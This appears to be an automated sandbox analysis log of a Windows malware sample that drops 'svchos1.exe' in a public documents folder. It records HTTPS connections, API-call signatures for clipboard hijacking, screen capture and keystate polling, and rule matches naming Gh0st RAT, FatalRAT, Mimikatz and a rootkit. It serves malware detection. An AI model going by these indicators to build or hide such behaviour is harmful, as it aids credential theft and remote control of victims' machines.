Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50313
Source: unknown	Network traffic detected: HTTP traffic on port 50223 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50312
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50349 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50325
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50328
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50327
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50329
Source: unknown	Network traffic detected: HTTP traffic on port 50245 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50322
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50321
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50324
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50323
Source: unknown	Network traffic detected: HTTP traffic on port 50372 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50290 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50432 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50327 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50296
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50295
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50298
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50297
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50299
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown	Network traffic detected: HTTP traffic on port 50286 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 50343 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50400 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50274 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50067
Source: unknown	Network traffic detected: HTTP traffic on port 50377 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown	Network traffic detected: HTTP traffic on port 50331 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown	Network traffic detected: HTTP traffic on port 50205 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50240 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown	Network traffic detected: HTTP traffic on port 50434 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50252 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50195 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown	Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50077
Source: unknown	Network traffic detected: HTTP traffic on port 50114 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50079
Source: unknown	Network traffic detected: HTTP traffic on port 50390 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50081
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50085
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50087
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50086
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50088
Source: unknown	Network traffic detected: HTTP traffic on port 50079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50094
Source: unknown	Network traffic detected: HTTP traffic on port 50136 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50365 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 50193 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50424 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50252
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50251
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50254
Source: unknown	Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50256
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50255
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50258
Source: unknown	Network traffic detected: HTTP traffic on port 50353 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50257
Source: unknown	Network traffic detected: HTTP traffic on port 50161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50261
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50260
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50215 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50230 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50387 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50263
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50262
Source: unknown	Network traffic detected: HTTP traffic on port 50318 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50265
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50264
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50267
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50269
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443

Source: unknown	HTTPS traffic detected: 113.142.77.41:443 -> 192.168.2.6:49693 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 113.142.77.41:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 113.142.77.41:443 -> 192.168.2.6:49698 version: TLS 1.2

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_035C2770 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,strstr,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,

28_2_035C2770

Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035C2770 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,strstr,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,	28_2_035C2770
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035C26B0 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,	28_2_035C26B0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035C29D0 printf,OpenClipboard,GlobalAlloc,GlobalLock,strstr,strstr,strstr,atoi,strstr,strstr,strstr,atoi,Sleep,Sleep,atoi,strstr,Sleep,Sleep,printf,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,	28_2_035C29D0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035D6F10 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,	28_2_035D6F10
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_03082770 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,strstr,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,	29_2_03082770
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_030826B0 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,	29_2_030826B0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_030829D0 printf,OpenClipboard,GlobalAlloc,GlobalLock,strstr,strstr,strstr,atoi,strstr,strstr,strstr,atoi,Sleep,Sleep,atoi,strstr,Sleep,Sleep,printf,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,	29_2_030829D0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_03096F10 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,	29_2_03096F10

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_035C2770 OpenClipboard,GetClipboardData,GlobalLock,GlobalLock,strstr,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalUnlock,CloseClipboard,

28_2_035C2770

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 29_2_01041270 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetDC,CreateCompatibleDC,ReleaseDC,CreateCompatibleBitmap,ReleaseDC,DeleteDC,SelectObject,DeleteObject,BitBlt,SelectObject,DeleteObject,DeleteDC,ReleaseDC,

29_2_01041270

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_006D8611 __EH_prolog3_GS,GetParent,GetParent,GetParent,UpdateWindow,SetCursor,GetAsyncKeyState,UpdateWindow,InflateRect,SetCapture,SetCursor,IsWindow,GetCursorPos,ScreenToClient,PtInRect,RedrawWindow,GetParent,GetParent,GetParent,RedrawWindow,RedrawWindow,GetParent,GetParent,GetParent,InvalidateRect,UpdateWindow,UpdateWindow,SetCapture,RedrawWindow,

28_2_006D8611

Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_007141AC MessageBeep,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW,SendMessageW,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,	28_2_007141AC
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_00740336 GetKeyState,GetKeyState,GetKeyState,GetTickCount,SetCapture,PeekMessageW,GetCapture,PeekMessageW,PeekMessageW,PtInRect,GetTickCount,ReleaseCapture,	28_2_00740336
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_006E8934 SendMessageW,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageW,	28_2_006E8934
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_00714D6C GetParent,GetKeyState,GetKeyState,GetKeyState,SendMessageW,SendMessageW,SendMessageW,	28_2_00714D6C
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_006F2E39 IsWindow,SendMessageW,GetCapture,GetKeyState,GetKeyState,GetKeyState,GetFocus,IsWindow,IsWindow,IsWindow,ClientToScreen,IsWindow,ClientToScreen,	28_2_006F2E39
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_00740ECC __EH_prolog3_GS,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageW,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetWindowPos,SendMessageW,_memset,_free,SendMessageW,GetParent,	28_2_00740ECC
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_006F0F32 IsWindow,SendMessageW,GetCapture,GetKeyState,GetKeyState,GetKeyState,GetFocus,IsWindow,IsWindow,IsWindow,ClientToScreen,IsWindow,ClientToScreen,	28_2_006F0F32
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0072D10D GetKeyState,GetKeyState,GetKeyState,GetKeyState,	28_2_0072D10D
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0075D272 GetWindowRect,GetKeyState,GetKeyState,GetKeyState,KillTimer,GetFocus,SetTimer,	28_2_0075D272
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_007141AC MessageBeep,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW,SendMessageW,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,	29_2_007141AC
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_00740336 GetKeyState,GetKeyState,GetKeyState,GetTickCount,SetCapture,PeekMessageW,GetCapture,PeekMessageW,PeekMessageW,PtInRect,GetTickCount,ReleaseCapture,	29_2_00740336
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_006E8934 SendMessageW,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageW,	29_2_006E8934
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_00714D6C GetParent,GetKeyState,GetKeyState,GetKeyState,SendMessageW,SendMessageW,SendMessageW,	29_2_00714D6C
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_006F2E39 IsWindow,SendMessageW,GetCapture,GetKeyState,GetKeyState,GetKeyState,GetFocus,IsWindow,IsWindow,IsWindow,ClientToScreen,IsWindow,ClientToScreen,	29_2_006F2E39
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_00740ECC __EH_prolog3_GS,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageW,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetWindowPos,SendMessageW,_memset,_free,SendMessageW,GetParent,	29_2_00740ECC
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_006F0F32 IsWindow,SendMessageW,GetCapture,GetKeyState,GetKeyState,GetKeyState,GetFocus,IsWindow,IsWindow,IsWindow,ClientToScreen,IsWindow,ClientToScreen,	29_2_006F0F32
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0072D10D GetKeyState,GetKeyState,GetKeyState,GetKeyState,	29_2_0072D10D
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0075D272 GetWindowRect,GetKeyState,GetKeyState,GetKeyState,KillTimer,GetFocus,SetTimer,	29_2_0075D272
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_00745F2B GetKeyState,GetKeyState,GetKeyState,	29_2_00745F2B

Source: conhost.exe

Process created: 67

System Summary

Malicious sample detected (through community Yara rule)

Source: 28.2.svchos1.exe.36bcd38.5.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 29.2.svchos1.exe.317cd38.5.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 29.2.svchos1.exe.318c380.6.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 28.2.svchos1.exe.358cd04.1.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 28.2.svchos1.exe.357d6bc.3.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 29.2.svchos1.exe.2a7d6bc.3.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 28.2.svchos1.exe.36cc380.4.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 29.2.svchos1.exe.2a8cd04.4.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 29.2.svchos1.exe.317cd38.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
Source: 29.2.svchos1.exe.317cd38.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 29.2.svchos1.exe.317cd38.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 29.2.svchos1.exe.318c380.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
Source: 29.2.svchos1.exe.318c380.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 29.2.svchos1.exe.318c380.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 29.2.svchos1.exe.2a8cd04.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
Source: 29.2.svchos1.exe.2a8cd04.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 29.2.svchos1.exe.2a8cd04.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 29.2.svchos1.exe.2a7d6bc.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
Source: 29.2.svchos1.exe.2a7d6bc.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 29.2.svchos1.exe.2a7d6bc.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 28.2.svchos1.exe.357d6bc.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
Source: 28.2.svchos1.exe.357d6bc.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 28.2.svchos1.exe.357d6bc.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 28.2.svchos1.exe.36bcd38.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
Source: 28.2.svchos1.exe.36bcd38.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 28.2.svchos1.exe.36bcd38.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 28.2.svchos1.exe.358cd04.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
Source: 28.2.svchos1.exe.358cd04.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 28.2.svchos1.exe.358cd04.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 28.2.svchos1.exe.36cc380.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report Author: Florian Roth
Source: 28.2.svchos1.exe.36cc380.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 28.2.svchos1.exe.36cc380.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 29.2.svchos1.exe.2980984.2.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 29.2.svchos1.exe.2980984.2.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 29.2.svchos1.exe.2980984.2.unpack, type: UNPACKEDPE	Matched rule: Detects FatalRAT Author: ditekSHen
Source: 28.2.svchos1.exe.3480984.2.unpack, type: UNPACKEDPE	Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 28.2.svchos1.exe.3480984.2.unpack, type: UNPACKEDPE	Matched rule: Detects the Hidden public rootkit Author: ditekSHen
Source: 28.2.svchos1.exe.3480984.2.unpack, type: UNPACKEDPE	Matched rule: Detects FatalRAT Author: ditekSHen

Source: C:\Users\user\Desktop\SystemProcess18.exe

Process Stats: CPU usage > 49%

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_035CE680: CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess,

28_2_035CE680

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_035D01A0 AttachConsole,AttachConsole,Sleep,AttachConsole,GetConsoleProcessList,GetConsoleProcessList,GetConsoleProcessList,GetCurrentProcessId,OpenProcess,TerminateProcess,CloseHandle,FreeConsole,FreeConsole,Sleep,FreeConsole,TerminateProcess,_swprintf,SHDeleteKeyA,OpenSCManagerA,OpenServiceA,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle,GetSystemDirectoryA,GetSystemDirectoryA,lstrcat,lstrcat,DeleteFileA,DeleteFileA,GetSystemDirectoryA,lstrcat,DeleteFileA,LocalFree,free,free,free,GetWindowsDirectoryA,GetCurrentProcess,IsWow64Process,DeleteFileA,SetServiceStatus,ExitProcess,

28_2_035D01A0

Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035D0650 ExitWindowsEx,	28_2_035D0650
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035CE680 CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess,	28_2_035CE680
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_03090650 ExitWindowsEx,	29_2_03090650
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0308E680 CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess,	29_2_0308E680

Source: C:\Users\user\Desktop\SystemProcess18.exe	Code function: 0_3_03DF2214	0_3_03DF2214
Source: C:\Users\user\Desktop\SystemProcess18.exe	Code function: 0_3_03DEC1B4	0_3_03DEC1B4
Source: C:\Users\user\Desktop\SystemProcess18.exe	Code function: 0_3_03DF1EB4	0_3_03DF1EB4
Source: C:\Users\user\Desktop\SystemProcess18.exe	Code function: 0_3_03DE1E2C	0_3_03DE1E2C
Source: C:\Users\user\Desktop\SystemProcess18.exe	Code function: 0_3_03DE1E2B	0_3_03DE1E2B
Source: C:\Users\user\Desktop\SystemProcess18.exe	Code function: 0_3_03DE5D60	0_3_03DE5D60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_041AB490	10_2_041AB490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_041AB470	10_2_041AB470
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_007FB490	19_2_007FB490
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_007282DD	28_2_007282DD
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_007C039C	28_2_007C039C
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_006DE4C7	28_2_006DE4C7
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_007367A8	28_2_007367A8
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_007B2EA7	28_2_007B2EA7
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0074B05D	28_2_0074B05D
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_00729379	28_2_00729379
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_007B5803	28_2_007B5803
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03514384	28_2_03514384
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_034FA034	28_2_034FA034
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035146B4	28_2_035146B4
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_034DC4E4	28_2_034DC4E4
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03484B54	28_2_03484B54
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03502B74	28_2_03502B74
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_034DCB74	28_2_034DCB74
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_034DA9C4	28_2_034DA9C4
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_034AA804	28_2_034AA804
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0349AE44	28_2_0349AE44
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_034DAE74	28_2_034DAE74
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03512C04	28_2_03512C04
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_034FF364	28_2_034FF364
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_034AB324	28_2_034AB324
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_034D9124	28_2_034D9124
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03515014	28_2_03515014
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_034A5024	28_2_034A5024
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0348B7E0	28_2_0348B7E0
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_034A97E4	28_2_034A97E4
